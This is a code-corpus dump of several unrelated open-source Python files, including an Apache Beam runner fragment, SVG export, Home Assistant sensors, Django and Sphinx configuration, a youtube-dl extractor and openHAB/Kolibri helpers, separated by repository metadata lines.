"Worker subprocess exited with return code %s" % p.returncode)
finally:
if p.poll() is None:
p.kill()
class JobLogHandler(logging.Handler):
"""Captures logs to be returned via the Beam Job API.
Enabled via the with statement."""
# Mapping from logging levels to LogEntry levels.
LOG_LEVEL_MAP = {
logging.FATAL: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.ERROR: beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR,
logging.WARNING: beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING,
logging.INFO: beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC,
logging.DEBUG: beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG,
}
def __init__(self, message_queue):
super(JobLogHandler, self).__init__()
self._message_queue = message_queue
self._last_id = 0
self._logged_thread = None
def __enter__(self):
# Remember the current thread to demultiplex the logs of concurrently
# running pipelines (as Python log handlers are global).
self._logged_thread = threading.current_thread()
logging.getLogger().addHandler(self)
def __exit__(self, *args):
self._logged_thread = None
self.close()
def _next_id(self):
self._last_id += 1
return str(self._last_id)
def emit(self, record):
if self._logged_thread is threading.current_thread():
self._message_queue.put(beam_job_api_pb2.JobMessagesResponse(
message_response=beam_job_api_pb2.JobMessage(
message_id=self._next_id(),
time=time.strftime(
'%Y-%m-%d %H:%M:%S.', time.localtime(record.created)),
importance=self.LOG_LEVEL_MAP[record.levelno],
message_text=self.format(record))))
def _pick_unused_port():
"""Not perfect, but we have to provide a port to the subprocess."""
# TODO(robertwb): Consider letting the subprocess communicate a choice of
# port back.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
_, port = s.getsockname()
s.close()
return port
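def _example_run_pipeline():
  """Usage sketch, not part of the original module.
  Assumes apache_beam is importable; the Create/Map expansion below is only a
  placeholder pipeline chosen to illustrate how the runner is wired in.
  """
  import apache_beam as beam
  runner = UniversalLocalRunner(use_grpc=True)
  p = beam.Pipeline(runner=runner)
  _ = p | beam.Create([1, 2, 3]) | beam.Map(lambda x: x * 2)
  result = runner.run(p)
  result.wait_until_finish()
  return result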
| apache-2.0 | -2,771,854,493,337,775,600 | 33.520782 | 80 | 0.675331 | false |
dstoe/vigra | vigranumpy/lib/pyqt/viewer2svg.py | 6 | 5276 | from __future__ import print_function
import os
from PyQt4 import QtCore, QtGui
def viewer2svg(viewer, basepath, onlyVisible = False, moveBy = QtCore.QPointF(0.5, 0.5)):
outvec=[]
outvec.append('<?xml version="1.0" standalone="no"?>\n')
outvec.append('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"\n')
outvec.append(' "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">\n')
pngFilename = basepath + "_bg.png"
viewer.image.writeImage(pngFilename, "")
_, bgFilename = os.path.split(pngFilename)
outvec.append('\n<svg version="1.1" xmlns="http://www.w3.org/2000/svg"\n')
outvec.append(' width="21cm" height="29.7cm" preserveAspectRatio="xMinYMin meet"\n')
outvec.append(' viewBox="-1 -1 ' + str(viewer.image.width + 1) + ' ' + \
str(viewer.image.height + 1) + '" xmlns:xlink="http://www.w3.org/1999/xlink">\n')
outvec.append('\n<g style="fill:none">\n')
outvec.append('\n<image xlink:href="' + bgFilename + '"\n')
outvec.append(' x="0" y="0" width="' + str(viewer.image.width) + '" height="' + \
str(viewer.image.height) + '" />\n')
ovs = []
for ov in viewer.overlays:
if onlyVisible and not ov.isVisible():
continue
ovname = viewer._defaultOverlayName(ov)
if ovname == "MapOverlay":
ovs.append([viewer._defaultOverlayName(ov.eo), ov.eo])
ovs.append([viewer._defaultOverlayName(ov.po), ov.po])
else:
ovs.append([ovname, ov])
for overlay in ovs:
if overlay[0] == "EdgeOverlay":
overlay = overlay[1]
color = 'rgb' + str(overlay.color.getRgb()[:3]) + '; opacity:' + str(overlay.color.getRgb()[-1] / 255.0)
if not overlay.colors:
for i, edge in enumerate(overlay.originalEdges):
outvec.append(writeEdge(edge, overlay.width, color, moveBy))
else:
for i, edge in enumerate(overlay.originalEdges):
if len(overlay.colors) > i:
color = overlay.colors[i] if hasattr(overlay.colors[i], "getRgb") else \
QtGui.QColor(overlay.colors[i])
color = 'rgb' + str(color.getRgb()[:3]) + '; opacity:' + str(color.getRgb()[-1] / 255.0)
outvec.append(writeEdge(edge, overlay.width, color, moveBy))
elif overlay[0] == "PointOverlay":
overlay = overlay[1]
color = ' style="fill:rgb' + str(overlay.color.getRgb()[:3]) + '; opacity:' + str(overlay.color.getRgb()[-1] / 255.0) + '"/>\n'
radius = '" r="' + str(overlay.radius if overlay.radius > 0 else 0.5) + '"\n'
pointList = []
for point in overlay.originalPoints:
pointList.append(QtCore.QPointF(*point) + moveBy)
for point in pointList:
outvec.append('<circle cx="' + str(point.x()) + '" cy="' + str(point.y()) + radius + color)
elif overlay[0] == "TextOverlay":
overlay = overlay[1]
for element in overlay.textlist:
if len(element) == 4:
outvec.extend(writeText(text = element[0], position = element[1], color = element[2], size = element[3]))
elif len(element) == 3:
outvec.extend(writeText(text = element[0], position = element[1], color = element[2]))
else:
outvec.extend(writeText(text = element[0], position = element[1]))
else:
print(str(overlay[0]) + " not supported yet.\n")
outvec.append('\n</g>\n')
outvec.append('</svg>\n')
f = open(basepath + ".svg", 'w')
for line in outvec:
f.write(line)
f.close()
def writeEdge(edge, width, color, moveBy):
qpolf = QtGui.QPolygonF(len(edge))
for i, (x, y) in enumerate(edge):
qpolf[i] = QtCore.QPointF(x,y) + moveBy
result = "\n"
if qpolf.size() == 2:
result += '<line x1="' + str(qpolf[0].x()) + '" y1="' + str(qpolf[0].y()) + '" '
result += 'x2="' + str(qpolf[1].x()) + '" y2="' + str(qpolf[1].y())
elif qpolf.size() > 2:
        result += '<polyline points="' + str(qpolf[0].x()) + ',' + str(qpolf[0].y())
        for pos in range(1, qpolf.size()):
            result += ' ' + str(qpolf[pos].x()) + ',' + str(qpolf[pos].y())
result += '"\n style="stroke:' + color + '; stroke-width:' + str(width if width > 0 else 0.5) + ';\n'
result += ' stroke-linejoin:bevel; stroke-linecap:butt;"/>\n'
return result
def writeText(text, position, color = None, size = None):
if not size:
size= "6"
if not color:
color = 'fill:rgb(0, 255, 0); opacity:1; stroke:rgb(0, 0, 0); stroke-width:0.3;'
else:
color = 'fill:rgb' + str(QtGui.QColor(color).getRgb()[:3]) + '; opacity:' + \
str(QtGui.QColor(color).getRgb()[-1] / 255.0) + '; stroke:rgb(0, 0, 0); stroke-width:0.3;'
style = ' style="' + color + '\n dominant-baseline: central; ' + \
'text-anchor: middle; font-size: ' + str(size) + 'pt; font-family: sans-serif"'
return '\n<text x="' + str(position[0]) + '" y="' + str(position[1]) + '"\n' + \
style + '>' + text.toUtf8().data() + '</text>\n'
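# Usage sketch, not part of the original module. It assumes an interactive
# vigra/PyQt4 session with a viewer whose .image and .overlays follow the
# conventions handled above; "out" is an illustrative basename only:
#
#   viewer2svg(viewer, "out", onlyVisible=True)
#
# This writes out_bg.png (the raster background) and out.svg referencing it.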
| mit | -1,960,437,019,781,107,500 | 46.963636 | 140 | 0.540182 | false |
jabesq/home-assistant | homeassistant/components/verisure/binary_sensor.py | 8 | 1701 | """Support for Verisure binary sensors."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from . import CONF_DOOR_WINDOW, HUB as hub
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Verisure binary sensors."""
sensors = []
hub.update_overview()
if int(hub.config.get(CONF_DOOR_WINDOW, 1)):
sensors.extend([
VerisureDoorWindowSensor(device_label)
for device_label in hub.get(
"$.doorWindow.doorWindowDevice[*].deviceLabel")])
add_entities(sensors)
class VerisureDoorWindowSensor(BinarySensorDevice):
"""Representation of a Verisure door window sensor."""
def __init__(self, device_label):
"""Initialize the Verisure door window sensor."""
self._device_label = device_label
@property
def name(self):
"""Return the name of the binary sensor."""
return hub.get_first(
"$.doorWindow.doorWindowDevice[?(@.deviceLabel=='%s')].area",
self._device_label)
@property
def is_on(self):
"""Return the state of the sensor."""
return hub.get_first(
"$.doorWindow.doorWindowDevice[?(@.deviceLabel=='%s')].state",
self._device_label) == "OPEN"
@property
def available(self):
"""Return True if entity is available."""
return hub.get_first(
"$.doorWindow.doorWindowDevice[?(@.deviceLabel=='%s')]",
self._device_label) is not None
# pylint: disable=no-self-use
def update(self):
"""Update the state of the sensor."""
hub.update_overview()
| apache-2.0 | 2,645,123,012,917,404,700 | 29.927273 | 74 | 0.621399 | false |
andymcbride/SensorMonitor | test_storage.py | 1 | 2017 | import unittest
from storage import Storage
from sensor import SensorData
from pathlib2 import Path
from sqlite3 import IntegrityError
class MyTestCase(unittest.TestCase):
def setUp(self):
self.filename = 'test.db'
self.storage = Storage(self.filename)
def tearDown(self):
path = Path(self.filename)
path.unlink()
def test_db_creates(self):
path = Path(self.filename)
self.assertEqual(True, path.is_file())
def test_table_not_exist(self):
self.assertEqual(False, self.storage.table_exists('data'))
def test_table_created(self):
# create table
self.storage.initialize_tables()
self.assertEqual(True, self.storage.table_exists('data'))
self.assertEqual(True, self.storage.table_exists('sensors'))
def test_create_sensor(self):
self.storage.initialize_tables()
self.storage.create_sensor_if_not_exists('Test', 'Temp')
def test_create_sensor_fail(self):
self.storage.initialize_tables()
with self.assertRaises(IntegrityError):
self.storage.create_sensor_if_not_exists(None, None)
def test_get_sensor_id(self):
self.storage.initialize_tables()
sensor_id = self.storage.create_sensor_if_not_exists('real', 'test')
self.assertNotEqual(sensor_id, None)
self.assertEqual(sensor_id, 1)
def test_get_sensor_id_fail(self):
self.storage.initialize_tables()
with self.assertRaises(ValueError):
sensor_id = self.storage.get_id('FAKE')
def test_save_sensor_data(self):
self.storage.initialize_tables()
sensor_id = self.storage.create_sensor_if_not_exists('real', 'test')
value = SensorData(sensor_id=sensor_id)
value.add_value({'temperature': 90, 'humidity': 60})
self.storage.insert_sensor_data(value)
result = self.storage.get_latest_value(sensor_id)
self.assertEqual(value, result)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -6,787,078,605,793,974,000 | 32.065574 | 76 | 0.654437 | false |
kbase/KBaseSearchEngine | docsource/conf.py | 2 | 5238 | # -*- coding: utf-8 -*-
#
# KBaseSearchEngine documentation build configuration file, created by
# sphinx-quickstart on Wed Dec 6 20:18:36 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('_ext'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autosectionlabel',
'jsonlexer',
'numfig']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'KBaseSearchEngine'
copyright = u'KBase'
author = u'Gavin Price, Arfath Pasha'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.01'
# The full version, including alpha/beta/rc tags.
release = u'0.01'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# This is required for the alabaster theme
# refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars
html_sidebars = {
'**': [
'relations.html', # needs 'show_related': True theme option to display
'searchbox.html',
]
}
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'KBaseSearchEnginedoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'KBaseSearchEngine.tex', u'KBaseSearchEngine Documentation',
u'Gavin Price, Arfath Pasha', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'kbasesearchengine', u'KBaseSearchEngine Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'KBaseSearchEngine', u'KBaseSearchEngine Documentation',
author, 'KBaseSearchEngine', 'One line description of project.',
'Miscellaneous'),
]
| mit | -4,442,942,069,847,366,700 | 29.453488 | 79 | 0.682321 | false |
ofer43211/unisubs | utils/html.py | 6 | 1024 | # Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
import htmllib, formatter
def unescape(s):
p = htmllib.HTMLParser(formatter.NullFormatter() )
# we need to preserve line breaks, nofill makes sure we don't
# loose them
p.nofill = True
p.save_bgn()
p.feed(s)
return p.save_end().strip()
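if __name__ == "__main__":
    # Minimal usage sketch, not part of the original module: HTML entities are
    # decoded while line breaks are preserved (p.nofill is set above).
    assert unescape("Fish & Chips\nTea & Cake") == "Fish & Chips\nTea & Cake"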
| agpl-3.0 | 5,050,333,931,074,619,000 | 35.571429 | 74 | 0.740234 | false |
brunosmmm/hdltools | hdltools/vcd/trigger/event.py | 1 | 1166 | """Trigger event."""
from typing import Optional
from hdltools.vcd import VCDObject
from hdltools.vcd.trigger import VCDTriggerDescriptor
class VCDTriggerEvent(VCDObject):
"""VCD trigger event."""
EVENT_TYPES = ("condition", "trigger")
def __init__(
self,
evt_type: str,
time: int,
evt: Optional[VCDTriggerDescriptor] = None,
):
"""Initialize."""
if not isinstance(time, int):
raise TypeError("time must be an integer")
self._time = time
if evt_type not in self.EVENT_TYPES:
raise ValueError("invalid event type")
self._type = evt_type
if evt is None:
self._evt = None
elif not isinstance(evt, VCDTriggerDescriptor):
raise TypeError("evt must be a VCDTriggerDescriptor object")
else:
self._evt = evt
@property
def time(self):
"""Get occurrence time."""
return self._time
@property
def evt_type(self):
"""Get event type."""
return self._type
@property
def evt(self):
"""Get trigger descriptor."""
return self._evt
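def _example_trigger_event():
    """Usage sketch, not part of the original module.
    Records a bare trigger event at simulation time 1500; attaching a
    VCDTriggerDescriptor built elsewhere works the same way through the evt
    keyword argument.
    """
    event = VCDTriggerEvent("trigger", 1500)
    return event.evt_type, event.time, event.evt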
| mit | -8,231,810,253,720,325,000 | 23.808511 | 72 | 0.577187 | false |
meshulam/chicago-justice | cjp/crimedata/models.py | 1 | 6764 | from django.db import models
from django.db import connection
import datetime
class CrimeReport(models.Model):
orig_ward = models.CharField(max_length=5, db_index=True) # character varying(5) NOT NULL,
orig_rd = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
orig_beat_num = models.CharField(max_length=8, db_index=True) # character varying(8),
orig_location_descr = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
orig_fbi_descr = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
orig_domestic_i = models.CharField(max_length=4, db_index=True) # character varying(4) NOT NULL,
orig_status = models.CharField(max_length=50, db_index=True) # character varying(50) NOT NULL,
orig_street = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
orig_fbi_cd = models.CharField(max_length=10, db_index=True) # character varying(10) NOT NULL,
orig_dateocc = models.CharField(max_length=50, db_index=True) # character varying(50) NOT NULL,
orig_stnum = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
orig_description = models.CharField(max_length=150, db_index=True) # character varying(150) NOT NULL,
orig_stdir = models.CharField(max_length=10, db_index=True) # character varying(10) NOT NULL,
orig_curr_iucr = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
web_case_num = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
web_date = models.DateTimeField(db_index=True) # timestamp without time zone NOT NULL,
web_block = models.CharField(max_length=200, db_index=True) # character varying(200) NOT NULL,
web_code = models.CharField(max_length=20, db_index=True) # character varying(20) NOT NULL,
web_crime_type = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
web_secondary = models.CharField(max_length=150, db_index=True) # character varying(150) NOT NULL,
web_arrest = models.CharField(max_length=1, db_index=True) # character(1) NOT NULL,
web_location = models.CharField(max_length=100, db_index=True) # character varying(100) NOT NULL,
web_domestic = models.CharField(max_length=4, db_index=True) # character varying(4) NOT NULL,
web_beat = models.CharField(max_length=8, db_index=True) # character varying(8) NOT NULL,
web_ward = models.CharField(max_length=5, db_index=True) # character varying(5) NOT NULL,
web_nibrs = models.CharField(max_length=11, db_index=True) # character varying(11) NOT NULL,
crime_date = models.DateField(db_index=True) # date NOT NULL,
crime_time = models.TimeField(db_index=True)
geocode_latitude = models.FloatField(db_index=True) # double precision NOT NULL,
geocode_longitude = models.FloatField(db_index=True) # double precision NOT NULL
class LookupCRCrimeDateMonth(models.Model):
year = models.SmallIntegerField(db_index=True)
month = models.SmallIntegerField(db_index=True)
the_date = models.DateField()
@staticmethod
def createLookup():
LookupCRCrimeDateMonth.objects.all().delete()
months = CrimeReport.objects.extra(select={
'month_date': "to_char(crime_date, 'YYYY-MM')",
'the_month' : 'extract(month from crime_date)',
'the_year' : 'extract(year from crime_date)'})
months = months.values('month_date', 'the_month', 'the_year').order_by('month_date').distinct()
for m in months:
lcrm = LookupCRCrimeDateMonth(year=int(m['the_year']),
month=int(m['the_month']),
the_date=datetime.date(int(m['the_year']), int(m['the_month']), 1))
lcrm.save()
class LookupCRCode(models.Model):
web_code = models.CharField(max_length=20, db_index=True)
@staticmethod
def createLookup():
LookupCRCode.objects.all().delete()
codes = CrimeReport.objects.all().values('web_code').order_by('web_code').distinct()
for code in codes:
lcr = LookupCRCode(web_code=code['web_code'])
lcr.save()
class LookupCRCrimeType(models.Model):
web_crime_type = models.CharField(max_length=100, db_index=True)
@staticmethod
def createLookup():
LookupCRCrimeType.objects.all().delete()
crimeTypes = CrimeReport.objects.all().values('web_crime_type').order_by('web_crime_type').distinct()
for crimeType in crimeTypes:
if len(crimeType['web_crime_type']) > 0:
lcrt = LookupCRCrimeType(web_crime_type=crimeType['web_crime_type'])
lcrt.save()
class LookupCRSecondary(models.Model):
web_secondary = models.CharField(max_length=150, db_index=True)
@staticmethod
def createLookup():
LookupCRSecondary.objects.all().delete()
secondaries = CrimeReport.objects.all().values('web_secondary').order_by('web_secondary').distinct()
for secondary in secondaries:
if len(secondary['web_secondary']) > 0:
lcrs = LookupCRSecondary(web_secondary=secondary['web_secondary'])
lcrs.save()
class LookupCRBeat(models.Model):
web_beat = models.CharField(max_length=8, db_index=True)
@staticmethod
def createLookup():
LookupCRBeat.objects.all().delete()
beats = CrimeReport.objects.all().values('web_beat').order_by('web_beat').distinct()
for beat in beats:
if len(beat['web_beat']) > 0:
lcrb = LookupCRBeat(web_beat=beat['web_beat'])
lcrb.save()
class LookupCRWard(models.Model):
web_ward = models.CharField(max_length=5, db_index=True)
@staticmethod
def createLookup():
LookupCRWard.objects.all().delete()
wards = CrimeReport.objects.all().values('web_ward').order_by('web_ward').distinct()
for ward in wards:
if len(ward['web_ward']) > 0:
lcrw = LookupCRWard(web_ward=ward['web_ward'])
lcrw.save()
class LookupCRNibrs(models.Model):
web_nibrs = models.CharField(max_length=11, db_index=True)
@staticmethod
def createLookup():
LookupCRNibrs.objects.all().delete()
nibrss = CrimeReport.objects.all().values('web_nibrs').order_by('web_nibrs').distinct()
for nibrs in nibrss:
if len(nibrs['web_nibrs']) > 0:
lcrn = LookupCRNibrs(web_nibrs=nibrs['web_nibrs'])
lcrn.save() | gpl-3.0 | 917,793,423,594,398,500 | 49.111111 | 110 | 0.648137 | false |
huyphan/pyyawhois | yawhois/parser/base_shared2.py | 1 | 3211 | from .base_scannable import ScannableParserBase
from ..scanner.base_shared2 import BaseShared2Scanner
from ..utils import array_wrapper
from ..record import Nameserver
from ..record import Contact
from ..record import Registrar
from dateutil import parser as time_parser
class BaseShared2Parser(ScannableParserBase):
_scanner = BaseShared2Scanner
@property
def domain(self):
if self.node("Domain Name"):
return self.node("Domain Name").lower()
@property
def domain_id(self):
return self.node("Domain ID")
@property
def status(self):
if self.node("Domain Status"):
return array_wrapper(self.node("Domain Status"))
@property
def available(self):
return bool(self.node("status:available"))
@property
def registered(self):
return not self.available
@property
def created_on(self):
if self.node("Domain Registration Date"):
return time_parser.parse(self.node("Domain Registration Date"))
@property
def updated_on(self):
if self.node("Domain Last Updated Date"):
return time_parser.parse(self.node("Domain Last Updated Date"))
@property
def expires_on(self):
if self.node("Domain Expiration Date"):
return time_parser.parse(self.node("Domain Expiration Date"))
@property
def registrar(self):
if self.node("Sponsoring Registrar"):
return Registrar(id = self.node("Sponsoring Registrar IANA ID"), name = self.node("Sponsoring Registrar"))
@property
def registrant_contacts(self):
return self._build_contact("Registrant", Contact.TYPE_REGISTRANT)
@property
def admin_contacts(self):
return self._build_contact("Administrative Contact", Contact.TYPE_ADMINISTRATIVE)
@property
def technical_contacts(self):
return self._build_contact("Technical Contact", Contact.TYPE_TECHNICAL)
@property
def nameservers(self):
return [Nameserver(name = name.lower()) for name in array_wrapper(self.node("Name Server"))]
def _build_contact(self, element, type_):
if self.node("%s ID" % element):
address = "\n".join(filter(None, [self.node("%s Address%d" % (element, i)) for i in range(1, 4)]))
return Contact(**{
'type' : type_,
'id' : self.node("%s ID" % element),
'name' : self.node("%s Name" % element),
'organization' : self.node("%s Organization" % element),
'address' : address,
'city' : self.node("%s City" % element),
'zip' : self.node("%s Postal Code" % element),
'state' : self.node("%s State/Province" % element),
'country' : self.node("%s Country" % element),
'country_code' : self.node("%s Country Code" % element),
'phone' : self.node("%s Phone Number" % element),
'fax' : self.node("%s Facsimile Number" % element),
'email' : self.node("%s Email" % element)
})
| mit | 9,131,807,655,424,589,000 | 34.688889 | 118 | 0.58611 | false |
azumimuo/family-xbmc-addon | script.module.youtube.dl/lib/youtube_dl/extractor/egghead.py | 7 | 1342 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class EggheadCourseIE(InfoExtractor):
IE_DESC = 'egghead.io course'
IE_NAME = 'egghead:course'
_VALID_URL = r'https://egghead\.io/courses/(?P<id>[^/?#&]+)'
_TEST = {
'url': 'https://egghead.io/courses/professor-frisby-introduces-composable-functional-javascript',
'playlist_count': 29,
'info_dict': {
'id': 'professor-frisby-introduces-composable-functional-javascript',
'title': 'Professor Frisby Introduces Composable Functional JavaScript',
'description': 're:(?s)^This course teaches the ubiquitous.*You\'ll start composing functionality before you know it.$',
},
}
def _real_extract(self, url):
playlist_id = self._match_id(url)
course = self._download_json(
'https://egghead.io/api/v1/series/%s' % playlist_id, playlist_id)
entries = [
self.url_result(
'wistia:%s' % lesson['wistia_id'], ie='Wistia',
video_id=lesson['wistia_id'], video_title=lesson.get('title'))
for lesson in course['lessons'] if lesson.get('wistia_id')]
return self.playlist_result(
entries, playlist_id, course.get('title'),
course.get('description'))
| gpl-2.0 | -3,845,287,956,764,960,000 | 37.342857 | 132 | 0.607303 | false |
pashinin-com/pashinin.com | src/core/migrations/0001_initial.py | 1 | 2313 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-30 11:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '__first__'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('added', models.DateTimeField(auto_now_add=True, db_index=True)),
('changed', models.DateTimeField(auto_now=True, db_index=True)),
('email', models.EmailField(db_index=True, max_length=255, unique=True, verbose_name='Email')),
('username', models.CharField(db_index=True, max_length=200)),
('is_staff', models.BooleanField(default=False)),
('is_active', models.BooleanField(default=True)),
('date_joined', models.DateTimeField(auto_now_add=True, db_index=True)),
('first_name', models.CharField(max_length=200)),
('last_name', models.CharField(max_length=200)),
('date_last_pass_sent', models.DateTimeField(null=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'User',
'verbose_name_plural': 'Users',
},
),
]
| gpl-3.0 | -2,121,084,785,230,692,900 | 54.071429 | 266 | 0.607869 | false |
pidah/st2contrib | packs/openhab/actions/lib/action.py | 10 | 1686 | import requests
import base64
from st2actions.runners.pythonrunner import Action
class BaseAction(Action):
def __init__(self, config):
super(BaseAction, self).__init__(config)
self.auth = None
self.username = self.config.get('username', None)
self.password = self.config.get('password', None)
self.hostname = self.config.get('hostname', None)
self.port = self.config.get('port', 8080)
self.url = "{}:{}/rest/items".format(self.hostname, self.port)
if self.username and self.password:
self.auth = base64.encodestring(
'%s:%s' % (self.username, self.password)).replace('\n', '')
def _headers(self):
payload = {
"Content-type": "text/plain",
"Accept": "application/json"
}
if self.auth:
            payload['Authorization'] = "Basic {}".format(self.auth)
return payload
def _get(self, key):
url = "{}/{}".format(self.url, key) if key else self.url
payload = {'type': 'json'}
req = requests.get(url, params=payload, headers=self._headers())
return self._parse_req(req)
def _put(self, key, value):
url = "{}/{}/state".format(self.url, key)
req = requests.put(url, data=value, headers=self._headers())
return self._parse_req(req)
def _post(self, key, value):
url = "{}/{}".format(self.url, key)
req = requests.post(url, data=value, headers=self._headers())
return self._parse_req(req)
def _parse_req(self, req):
req.raise_for_status()
try:
return req.json()
except:
return req.text
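class _ExampleItemCommandAction(BaseAction):
    """Usage sketch, not part of the original pack.
    Shows how a concrete action would drive the helpers above; the item name
    and command are placeholders chosen only for illustration.
    """
    def run(self, item="Kitchen_Light", command="ON"):
        before = self._get(item)  # current item state as parsed JSON
        result = self._post(item, command)  # send the command to the item
        return {"before": before, "result": result}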
| apache-2.0 | -2,299,476,187,434,650,600 | 32.058824 | 75 | 0.568802 | false |
DXCanas/kolibri | kolibri/core/discovery/serializers.py | 1 | 1028 | from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from rest_framework import serializers
from rest_framework.serializers import ValidationError
from .models import NetworkLocation
from .utils.network import errors
from .utils.network.client import NetworkClient
class NetworkLocationSerializer(serializers.ModelSerializer):
class Meta:
model = NetworkLocation
fields = ('id', 'available', 'base_url', 'device_name', 'instance_id', 'added', 'last_accessed', 'operating_system', 'application', 'kolibri_version')
read_only_fields = ('available', 'instance_id', 'added', 'last_accessed', 'operating_system', 'application', 'kolibri_version')
def validate_base_url(self, value):
try:
client = NetworkClient(address=value)
except errors.NetworkError as e:
raise ValidationError("Error with address {} ({})".format(value, e.__class__.__name__), code=e.code)
return client.base_url
| mit | 8,020,563,567,040,571,000 | 40.12 | 158 | 0.702335 | false |
fuzeman/Catalytic | deluge/ui/gtkui/new_release_dialog.py | 4 | 3566 | #
# new_release_dialog.py
#
# Copyright (C) 2008 Andrew Resch <[email protected]>
#
# Deluge is free software.
#
# You may redistribute it and/or modify it under the terms of the
# GNU General Public License, as published by the Free Software
# Foundation; either version 3 of the License, or (at your option)
# any later version.
#
# deluge is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with deluge. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
